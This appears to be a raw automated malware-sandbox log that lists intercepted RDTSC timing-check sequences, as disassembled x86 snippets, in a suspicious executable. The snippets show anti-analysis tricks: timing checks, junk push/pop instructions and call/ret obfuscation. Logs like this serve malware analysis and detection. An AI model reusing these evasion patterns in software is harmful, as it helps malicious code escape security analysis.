Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 143FF9A second address: 143FFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147FEC4 second address: 147FEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FB0A4FB5B8Eh 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147FEE3 second address: 147FEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147FEE9 second address: 147FEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FB0A4FB5B86h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1480F8E second address: 1480FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D65h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1480FA7 second address: 1480FC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007FB0A4FB5B88h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1480FC6 second address: 1480FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148113D second address: 1481143 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14816BE second address: 1481717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FB0A5355D69h 0x0000000b pop ecx 0x0000000c popad 0x0000000d nop 0x0000000e mov dword ptr [ebp+12B2F31Fh], ecx 0x00000014 push 00000000h 0x00000016 and si, 971Fh 0x0000001b push 00000000h 0x0000001d sub dword ptr [ebp+129C19C3h], edi 0x00000023 jg 00007FB0A5355D5Ch 0x00000029 sub dword ptr [ebp+129C3C02h], ebx 0x0000002f xchg eax, ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FB0A5355D63h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1481717 second address: 148172E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB0A4FB5B8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148172E second address: 1481738 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB0A5355D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1482118 second address: 1482121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1482121 second address: 1482125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1482125 second address: 148219C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b or dword ptr [ebp+129C1935h], ecx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FB0A4FB5B88h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov edi, ebx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007FB0A4FB5B88h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b sub dword ptr [ebp+12B57D7Fh], edi 0x00000051 push eax 0x00000052 push esi 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148219C second address: 14821A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14831E8 second address: 148326F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FB0A4FB5B86h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FB0A4FB5B88h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+129C1BEAh] 0x0000002f or dword ptr [ebp+12B2C59Dh], esi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007FB0A4FB5B88h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 push 00000000h 0x00000053 sub dword ptr [ebp+129C1B0Bh], eax 0x00000059 xchg eax, ebx 0x0000005a push edx 0x0000005b push ecx 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e pop ecx 0x0000005f pop edx 0x00000060 push eax 0x00000061 pushad 0x00000062 jmp 00007FB0A4FB5B94h 0x00000067 push ecx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1483D11 second address: 1483D69 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB0A5355D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FB0A5355D58h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 jmp 00007FB0A5355D5Fh 0x0000002b push 00000000h 0x0000002d xor edi, 6BE2E4EEh 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 je 00007FB0A5355D5Ch 0x0000003e jng 00007FB0A5355D56h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148513E second address: 1485148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB0A4FB5B86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1485D9B second address: 1485E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007FB0A5355D5Ah 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FB0A5355D58h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 or dword ptr [ebp+129C1F80h], edx 0x0000002c xor esi, dword ptr [ebp+129C33CBh] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FB0A5355D58h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Ah 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e push eax 0x0000004f jo 00007FB0A5355D5Ch 0x00000055 jp 00007FB0A5355D56h 0x0000005b pop edi 0x0000005c pushad 0x0000005d mov dword ptr [ebp+129C2218h], ecx 0x00000063 add dword ptr [ebp+129C2204h], esi 0x00000069 popad 0x0000006a push 00000000h 0x0000006c mov esi, 7C70CA76h 0x00000071 sub dword ptr [ebp+12B57177h], esi 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jp 00007FB0A5355D58h 0x00000080 push ecx 0x00000081 pop ecx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1485E31 second address: 1485E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1485E37 second address: 1485E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148C6B5 second address: 148C6C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148D52D second address: 148D591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, 4E3696F9h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FB0A5355D58h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+129C1FC4h] 0x00000031 push 00000000h 0x00000033 mov ebx, ecx 0x00000035 xchg eax, esi 0x00000036 jmp 00007FB0A5355D5Fh 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148C8F6 second address: 148C8FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148D591 second address: 148D595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148E642 second address: 148E646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148D6E1 second address: 148D6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148D6E5 second address: 148D73E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB0A4FB5B95h 0x00000008 jmp 00007FB0A4FB5B8Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 jne 00007FB0A4FB5B87h 0x00000026 mov eax, dword ptr [ebp+129C00A9h] 0x0000002c mov dword ptr [ebp+12B57D7Fh], ebx 0x00000032 push FFFFFFFFh 0x00000034 mov dword ptr [ebp+129C1F70h], esi 0x0000003a nop 0x0000003b jno 00007FB0A4FB5B8Eh 0x00000041 push eax 0x00000042 push edi 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148E832 second address: 148E838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148F640 second address: 148F644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148F644 second address: 148F64A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148F64A second address: 148F669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FB0A4FB5B92h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148F669 second address: 148F674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148F674 second address: 148F678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148F678 second address: 148F6C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b sbb edi, 3208AD05h 0x00000011 push 00000000h 0x00000013 call 00007FB0A5355D5Ch 0x00000018 mov dword ptr [ebp+12B604F3h], esi 0x0000001e pop edi 0x0000001f push 00000000h 0x00000021 xor edi, dword ptr [ebp+129C19ABh] 0x00000027 xchg eax, esi 0x00000028 je 00007FB0A5355D64h 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148F6C1 second address: 148F6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB0A4FB5B86h 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148F6D2 second address: 148F6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148F6D6 second address: 148F6DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 148F87A second address: 148F896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FB0A5355D56h 0x00000009 jnp 00007FB0A5355D56h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007FB0A5355D56h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149156F second address: 14915D3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB0A4FB5B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FB0A4FB5B88h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a jne 00007FB0A4FB5B98h 0x00000030 push 00000000h 0x00000032 xor edi, dword ptr [ebp+129C1A10h] 0x00000038 mov dword ptr [ebp+129C1EADh], ecx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FB0A4FB5B8Dh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14925EF second address: 1492671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0A5355D67h 0x00000009 popad 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FB0A5355D58h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push ecx 0x00000027 mov ebx, dword ptr [ebp+129C1C21h] 0x0000002d pop edi 0x0000002e clc 0x0000002f push 00000000h 0x00000031 mov ebx, dword ptr [ebp+129C2A93h] 0x00000037 mov edi, 6A8D8031h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007FB0A5355D58h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 00000016h 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 mov dword ptr [ebp+129C1BF7h], edi 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149172E second address: 1491743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007FB0A4FB5B92h 0x0000000d jc 00007FB0A4FB5B8Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1492671 second address: 1492677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1492677 second address: 149267C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1493544 second address: 14935CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, dword ptr [ebp+129C2A1Fh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FB0A5355D58h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c add dword ptr [ebp+129C1C9Bh], edx 0x00000032 mov edi, dword ptr [ebp+129C2A8Fh] 0x00000038 jng 00007FB0A5355D5Bh 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007FB0A5355D58h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000015h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a xchg eax, esi 0x0000005b jmp 00007FB0A5355D5Bh 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14935CA second address: 14935DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0A4FB5B8Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149449A second address: 149449E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149449E second address: 149453F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FB0A4FB5B88h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov dword ptr [ebp+129C1B3Fh], eax 0x00000018 add dword ptr [ebp+129C1A89h], esi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FB0A4FB5B88h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a mov di, cx 0x0000003d jmp 00007FB0A4FB5B8Dh 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007FB0A4FB5B88h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 00000019h 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e clc 0x0000005f sub edi, dword ptr [ebp+129C21BEh] 0x00000065 push eax 0x00000066 pushad 0x00000067 jbe 00007FB0A4FB5B8Ch 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007FB0A4FB5B96h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149453F second address: 1494543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14957D9 second address: 14957DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14986C8 second address: 1498777 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB0A5355D58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f adc bx, 45E1h 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FB0A5355D58h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 xor dword ptr [ebp+129C1BA7h], ecx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007FB0A5355D58h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 00000014h 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c jmp 00007FB0A5355D5Bh 0x00000061 mov eax, dword ptr [ebp+129C175Dh] 0x00000067 stc 0x00000068 push FFFFFFFFh 0x0000006a nop 0x0000006b jmp 00007FB0A5355D69h 0x00000070 push eax 0x00000071 pushad 0x00000072 jmp 00007FB0A5355D68h 0x00000077 push eax 0x00000078 push edx 0x00000079 push esi 0x0000007a pop esi 0x0000007b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14957DD second address: 14957F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149960F second address: 1499613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149A6A8 second address: 149A6AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1499613 second address: 149961E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149A786 second address: 149A78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 149B7F2 second address: 149B7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14A3A2D second address: 14A3A49 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB0A4FB5B8Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jng 00007FB0A4FB5B86h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14A3BF5 second address: 14A3BFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF6E1 second address: 14AF715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FB0A4FB5B97h 0x0000000c popad 0x0000000d pushad 0x0000000e jns 00007FB0A4FB5B86h 0x00000014 ja 00007FB0A4FB5B86h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF715 second address: 14AF719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AE4B7 second address: 14AE4BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
